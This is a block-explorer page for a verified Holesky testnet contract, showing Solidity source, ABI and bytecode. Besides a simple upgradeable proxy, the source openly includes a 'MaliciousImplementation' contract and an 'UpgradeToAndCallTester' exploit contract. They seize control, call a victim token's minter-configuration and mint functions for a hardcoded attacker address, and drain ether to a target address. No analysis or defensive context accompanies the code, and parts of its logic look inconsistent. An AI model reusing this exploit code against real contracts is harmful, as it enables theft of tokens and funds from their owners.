Holesky Testnet

Contract

0x789eB23C02b34Daa44da69b40A1a8dE94e3C54aB

Overview

ETH Balance

0 ETH

Multichain Info

N/A
Transaction Hash
Method
Block
From
To

There are no matching entries

Please try again later

Advanced mode:
Parent Transaction Hash Block From To
View All Internal Transactions
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
UpgradeableProxy

Compiler Version
v0.8.28+commit.7893614a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2024-11-29
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;

// Proxy contract for upgradeability
contract UpgradeableProxy {
    address public implementation;
    address public owner;

    event Upgraded(address indexed newImplementation);
    event CallResult(bool success, bytes result);

    constructor(address _implementation) {
        implementation = _implementation;
        owner = msg.sender;
    }

    fallback() external payable {
        (bool success, bytes memory result) = implementation.delegatecall(msg.data);
        require(success, "Delegatecall failed");
        emit CallResult(success, result);
    }

    receive() external payable {
        if (msg.value > 0 && msg.sender != owner) {
            require(address(this).balance >= msg.value, "Insufficient balance");
            upgradeTo(implementation); // Upgrade using current implementation as the placeholder
        }
    }

    function upgradeTo(address _implementation) public {
        require(msg.sender == owner, "Not authorized");
        implementation = _implementation;
        emit Upgraded(_implementation);
    }
}

// Malicious implementation contract
contract MaliciousImplementation {
    address public proxyOwner;
    address public maliciousTarget;

    constructor(address _proxyOwner, address _maliciousTarget) {
        proxyOwner = _proxyOwner;
        maliciousTarget = _maliciousTarget;
    }

    // Hijack ownership of the proxy contract
    function takeOwnership() external {
        require(msg.sender == maliciousTarget, "Not authorized");
        proxyOwner = maliciousTarget;
    }

    // Function to set the masterMinter to the attacker's address (dynamically set)
    function setMasterMinter() external {
        require(msg.sender == proxyOwner, "Not authorized");

        // Dynamically set the masterMinter to the attacker's address (hardcoded here)
        address attackerAddress = 0x471aABd39E9aFa5F4798FC04be77C1cF587FB940;
        (bool success, ) = maliciousTarget.call(
            abi.encodeWithSignature("updateMasterMinter(address)", attackerAddress)
        );
        require(success, "setMasterMinter failed");
    }

    // Function to configure the attacker as a minter
    function configureMinter(address _minter, uint256 _allowedAmount) external {
        require(msg.sender == proxyOwner, "Not authorized");

        // Call the victim contract's configureMinter function
        (bool success, ) = maliciousTarget.call(
            abi.encodeWithSignature("configureMinter(address,uint256)", _minter, _allowedAmount)
        );
        require(success, "configureMinter failed");
    }

    // Mint tokens to the attacker's address
    function mint(address _to, uint256 _amount) external {
        require(msg.sender == proxyOwner, "Not authorized");

        // Call the victim contract's mint function
        (bool success, ) = maliciousTarget.call(
            abi.encodeWithSignature("mint(address,uint256)", _to, _amount)
        );
        require(success, "Mint failed");
    }

    fallback() external payable {}

    receive() external payable {
        if (msg.value > 0 && msg.sender != proxyOwner) {
            address payable target = payable(maliciousTarget);
            uint256 balance = address(this).balance;
            if (balance > 0) {
                target.transfer(balance); // Drain all funds to the malicious target
            }
        }
    }
}

// Exploit contract to interact with the vulnerable upgradeToAndCall functionality
contract UpgradeToAndCallTester {
    address public owner;
    address public maliciousTarget;

    event FallbackCalled(address indexed caller, bytes data);
    event CallResult(bool success, bytes result);

    constructor(address _maliciousTarget) {
        owner = msg.sender;
        maliciousTarget = _maliciousTarget;
    }

    function destroy() external {
        require(msg.sender == owner, "Not authorized");
        selfdestruct(payable(msg.sender));
    }

    fallback() external payable {
        emit FallbackCalled(msg.sender, msg.data);
    }

    receive() external payable {
        if (msg.value > 0 && msg.sender != owner) {
            drainFunds(payable(maliciousTarget)); // Transfer Ether to malicious target
        }
    }

    function complexOperation(uint256 recursiveDepth) external payable {
        require(msg.sender == owner, "Not authorized");
        require(recursiveDepth > 0, "Depth must be greater than zero");

        upgradeProxyToMalicious();
        drainFunds(payable(maliciousTarget));
        recursiveExploit(recursiveDepth);
    }

    function upgradeProxyToMalicious() internal {
        (bool success, ) = address(this).call(
            abi.encodeWithSignature("upgradeTo(address)", address(this))
        );
        require(success, "Upgrade to malicious contract failed");
        emit CallResult(success, "");
    }

    function drainFunds(address payable _to) internal {
        uint256 balance = address(this).balance;
        require(balance > 0, "No funds to drain");
        (bool success, ) = _to.call{value: balance}("");
        require(success, "Fund transfer failed");
        emit CallResult(success, "");
    }

    function recursiveExploit(uint256 depth) internal {
        if (depth == 0) return;
        (bool success, ) = address(this).delegatecall(
            abi.encodeWithSignature("recursiveExploit(uint256)", depth - 1)
        );
        require(success, "Recursive call failed");
    }
}

Contract ABI

[{"inputs":[{"internalType":"address","name":"_implementation","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"success","type":"bool"},{"indexed":false,"internalType":"bytes","name":"result","type":"bytes"}],"name":"CallResult","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newImplementation","type":"address"}],"name":"Upgraded","type":"event"},{"stateMutability":"payable","type":"fallback"},{"inputs":[],"name":"implementation","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_implementation","type":"address"}],"name":"upgradeTo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

608060405234801561000f575f5ffd5b5060405161087238038061087283398181016040528101906100319190610114565b805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503360015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505061013f565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6100e3826100ba565b9050919050565b6100f3816100d9565b81146100fd575f5ffd5b50565b5f8151905061010e816100ea565b92915050565b5f60208284031215610129576101286100b6565b5b5f61013684828501610100565b91505092915050565b6107268061014c5f395ff3fe608060405260043610610037575f3560e01c80633659cfe6146102125780635c60da1b1461023a5780638da5cb5b146102645761010c565b3661010c575f34118015610098575060015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614155b1561010a57344710156100e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016100d790610445565b60405180910390fd5b6101095f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1661028e565b5b005b5f5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f3660405161015592919061049f565b5f60405180830381855af49150503d805f811461018d576040519150601f19603f3d011682016040523d82523d5f602084013e610192565b606091505b5091509150816101d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016101ce90610501565b60405180910390fd5b7f582326e533af48b16567b0565a82550442e225cf8491cb9ae2a29e1f96935e7c82826040516102089291906105a9565b60405180910390a1005b34801561021d575f5ffd5b5061023860048036038101906102339190610635565b61028e565b005b348015610245575f5ffd5b5061024e6103a2565b60405161025b919061066f565b60405180910390f35b34801561026f575f5ffd5b506102786103c6565b604051610285919061066f565b60405180910390f35b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461031d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610314906106d2565b60405180910390fd5b805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff167fbc7cd75a20ee27fd9adebab32041f755214dbc6bffa90cc0225b39da2e5c2d3b60405160405180910390a250565b5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f82825260208201905092915050565b7f496e73756666696369656e742062616c616e63650000000000000000000000005f82015250565b5f61042f6014836103eb565b915061043a826103fb565b602082019050919050565b5f6020820190508181035f83015261045c81610423565b9050919050565b5f81905092915050565b828183375f83830152505050565b5f6104868385610463565b935061049383858461046d565b82840190509392505050565b5f6104ab82848661047b565b91508190509392505050565b7f44656c656761746563616c6c206661696c6564000000000000000000000000005f82015250565b5f6104eb6013836103eb565b91506104f6826104b7565b602082019050919050565b5f6020820190508181035f830152610518816104df565b9050919050565b5f8115159050919050565b6105338161051f565b82525050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f61057b82610539565b6105858185610543565b9350610595818560208601610553565b61059e81610561565b840191505092915050565b5f6040820190506105bc5f83018561052a565b81810360208301526105ce8184610571565b90509392505050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610604826105db565b9050919050565b610614816105fa565b811461061e575f5ffd5b50565b5f8135905061062f8161060b565b92915050565b5f6020828403121561064a576106496105d7565b5b5f61065784828501610621565b91505092915050565b610669816105fa565b82525050565b5f6020820190506106825f830184610660565b92915050565b7f4e6f7420617574686f72697a65640000000000000000000000000000000000005f82015250565b5f6106bc600e836103eb565b91506106c782610688565b602082019050919050565b5f6020820190508181035f8301526106e9816106b0565b905091905056fea264697066735822122059b73a77e2aedf4a0f8162da0f1283d0f9dfa67837f7722ae44957d4eb40cc2364736f6c634300081c0033000000000000000000000000471aabd39e9afa5f4798fc04be77c1cf587fb940

Deployed Bytecode

0x608060405260043610610037575f3560e01c80633659cfe6146102125780635c60da1b1461023a5780638da5cb5b146102645761010c565b3661010c575f34118015610098575060015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614155b1561010a57344710156100e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016100d790610445565b60405180910390fd5b6101095f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1661028e565b5b005b5f5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f3660405161015592919061049f565b5f60405180830381855af49150503d805f811461018d576040519150601f19603f3d011682016040523d82523d5f602084013e610192565b606091505b5091509150816101d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016101ce90610501565b60405180910390fd5b7f582326e533af48b16567b0565a82550442e225cf8491cb9ae2a29e1f96935e7c82826040516102089291906105a9565b60405180910390a1005b34801561021d575f5ffd5b5061023860048036038101906102339190610635565b61028e565b005b348015610245575f5ffd5b5061024e6103a2565b60405161025b919061066f565b60405180910390f35b34801561026f575f5ffd5b506102786103c6565b604051610285919061066f565b60405180910390f35b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461031d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610314906106d2565b60405180910390fd5b805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff167fbc7cd75a20ee27fd9adebab32041f755214dbc6bffa90cc0225b39da2e5c2d3b60405160405180910390a250565b5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f82825260208201905092915050565b7f496e73756666696369656e742062616c616e63650000000000000000000000005f82015250565b5f61042f6014836103eb565b915061043a826103fb565b602082019050919050565b5f6020820190508181035f83015261045c81610423565b9050919050565b5f81905092915050565b828183375f83830152505050565b5f6104868385610463565b935061049383858461046d565b82840190509392505050565b5f6104ab82848661047b565b91508190509392505050565b7f44656c656761746563616c6c206661696c6564000000000000000000000000005f82015250565b5f6104eb6013836103eb565b91506104f6826104b7565b602082019050919050565b5f6020820190508181035f830152610518816104df565b9050919050565b5f8115159050919050565b6105338161051f565b82525050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f61057b82610539565b6105858185610543565b9350610595818560208601610553565b61059e81610561565b840191505092915050565b5f6040820190506105bc5f83018561052a565b81810360208301526105ce8184610571565b90509392505050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610604826105db565b9050919050565b610614816105fa565b811461061e575f5ffd5b50565b5f8135905061062f8161060b565b92915050565b5f6020828403121561064a576106496105d7565b5b5f61065784828501610621565b91505092915050565b610669816105fa565b82525050565b5f6020820190506106825f830184610660565b92915050565b7f4e6f7420617574686f72697a65640000000000000000000000000000000000005f82015250565b5f6106bc600e836103eb565b91506106c782610688565b602082019050919050565b5f6020820190508181035f8301526106e9816106b0565b905091905056fea264697066735822122059b73a77e2aedf4a0f8162da0f1283d0f9dfa67837f7722ae44957d4eb40cc2364736f6c634300081c0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000471aabd39e9afa5f4798fc04be77c1cf587fb940

-----Decoded View---------------
Arg [0] : _implementation (address): 0x471aABd39E9aFa5F4798FC04be77C1cF587FB940

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000471aabd39e9afa5f4798fc04be77c1cf587fb940


Deployed Bytecode Sourcemap

99:1046:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;708:1;696:9;:13;:36;;;;;727:5;;;;;;;;;;;713:19;;:10;:19;;;;696:36;692:235;;;782:9;757:21;:34;;749:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;831:25;841:14;;;;;;;;;;;831:9;:25::i;:::-;692:235;99:1046;;471:12;485:19;508:14;;;;;;;;;;;:27;;536:8;;508:37;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;470:75;;;;564:7;556:39;;;;;;;;;;;;:::i;:::-;;;;;;;;;611:27;622:7;631:6;611:27;;;;;;;:::i;:::-;;;;;;;;459:187;942:200;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;132:29;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;168:20;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;942:200;1026:5;;;;;;;;;;;1012:19;;:10;:19;;;1004:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;1078:15;1061:14;;:32;;;;;;;;;;;;;;;;;;1118:15;1109:25;;;;;;;;;;;;942:200;:::o;132:29::-;;;;;;;;;;;;;:::o;168:20::-;;;;;;;;;;;;;:::o;7:169:1:-;91:11;125:6;120:3;113:19;165:4;160:3;156:14;141:29;;7:169;;;;:::o;182:170::-;322:22;318:1;310:6;306:14;299:46;182:170;:::o;358:366::-;500:3;521:67;585:2;580:3;521:67;:::i;:::-;514:74;;597:93;686:3;597:93;:::i;:::-;715:2;710:3;706:12;699:19;;358:366;;;:::o;730:419::-;896:4;934:2;923:9;919:18;911:26;;983:9;977:4;973:20;969:1;958:9;954:17;947:47;1011:131;1137:4;1011:131;:::i;:::-;1003:139;;730:419;;;:::o;1155:147::-;1256:11;1293:3;1278:18;;1155:147;;;;:::o;1308:148::-;1406:6;1401:3;1396;1383:30;1447:1;1438:6;1433:3;1429:16;1422:27;1308:148;;;:::o;1484:327::-;1598:3;1619:88;1700:6;1695:3;1619:88;:::i;:::-;1612:95;;1717:56;1766:6;1761:3;1754:5;1717:56;:::i;:::-;1798:6;1793:3;1789:16;1782:23;;1484:327;;;;;:::o;1817:291::-;1957:3;1979:103;2078:3;2069:6;2061;1979:103;:::i;:::-;1972:110;;2099:3;2092:10;;1817:291;;;;;:::o;2114:169::-;2254:21;2250:1;2242:6;2238:14;2231:45;2114:169;:::o;2289:366::-;2431:3;2452:67;2516:2;2511:3;2452:67;:::i;:::-;2445:74;;2528:93;2617:3;2528:93;:::i;:::-;2646:2;2641:3;2637:12;2630:19;;2289:366;;;:::o;2661:419::-;2827:4;2865:2;2854:9;2850:18;2842:26;;2914:9;2908:4;2904:20;2900:1;2889:9;2885:17;2878:47;2942:131;3068:4;2942:131;:::i;:::-;2934:139;;2661:419;;;:::o;3086:90::-;3120:7;3163:5;3156:13;3149:21;3138:32;;3086:90;;;:::o;3182:109::-;3263:21;3278:5;3263:21;:::i;:::-;3258:3;3251:34;3182:109;;:::o;3297:98::-;3348:6;3382:5;3376:12;3366:22;;3297:98;;;:::o;3401:168::-;3484:11;3518:6;3513:3;3506:19;3558:4;3553:3;3549:14;3534:29;;3401:168;;;;:::o;3575:139::-;3664:6;3659:3;3654;3648:23;3705:1;3696:6;3691:3;3687:16;3680:27;3575:139;;;:::o;3720:102::-;3761:6;3812:2;3808:7;3803:2;3796:5;3792:14;3788:28;3778:38;;3720:102;;;:::o;3828:373::-;3914:3;3942:38;3974:5;3942:38;:::i;:::-;3996:70;4059:6;4054:3;3996:70;:::i;:::-;3989:77;;4075:65;4133:6;4128:3;4121:4;4114:5;4110:16;4075:65;:::i;:::-;4165:29;4187:6;4165:29;:::i;:::-;4160:3;4156:39;4149:46;;3918:283;3828:373;;;;:::o;4207:407::-;4340:4;4378:2;4367:9;4363:18;4355:26;;4391:65;4453:1;4442:9;4438:17;4429:6;4391:65;:::i;:::-;4503:9;4497:4;4493:20;4488:2;4477:9;4473:18;4466:48;4531:76;4602:4;4593:6;4531:76;:::i;:::-;4523:84;;4207:407;;;;;:::o;4701:117::-;4810:1;4807;4800:12;4947:126;4984:7;5024:42;5017:5;5013:54;5002:65;;4947:126;;;:::o;5079:96::-;5116:7;5145:24;5163:5;5145:24;:::i;:::-;5134:35;;5079:96;;;:::o;5181:122::-;5254:24;5272:5;5254:24;:::i;:::-;5247:5;5244:35;5234:63;;5293:1;5290;5283:12;5234:63;5181:122;:::o;5309:139::-;5355:5;5393:6;5380:20;5371:29;;5409:33;5436:5;5409:33;:::i;:::-;5309:139;;;;:::o;5454:329::-;5513:6;5562:2;5550:9;5541:7;5537:23;5533:32;5530:119;;;5568:79;;:::i;:::-;5530:119;5688:1;5713:53;5758:7;5749:6;5738:9;5734:22;5713:53;:::i;:::-;5703:63;;5659:117;5454:329;;;;:::o;5789:118::-;5876:24;5894:5;5876:24;:::i;:::-;5871:3;5864:37;5789:118;;:::o;5913:222::-;6006:4;6044:2;6033:9;6029:18;6021:26;;6057:71;6125:1;6114:9;6110:17;6101:6;6057:71;:::i;:::-;5913:222;;;;:::o;6141:164::-;6281:16;6277:1;6269:6;6265:14;6258:40;6141:164;:::o;6311:366::-;6453:3;6474:67;6538:2;6533:3;6474:67;:::i;:::-;6467:74;;6550:93;6639:3;6550:93;:::i;:::-;6668:2;6663:3;6659:12;6652:19;;6311:366;;;:::o;6683:419::-;6849:4;6887:2;6876:9;6872:18;6864:26;;6936:9;6930:4;6926:20;6922:1;6911:9;6907:17;6900:47;6964:131;7090:4;6964:131;:::i;:::-;6956:139;;6683:419;;;:::o

Swarm Source

ipfs://59b73a77e2aedf4a0f8162da0f1283d0f9dfa67837f7722ae44957d4eb40cc23

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.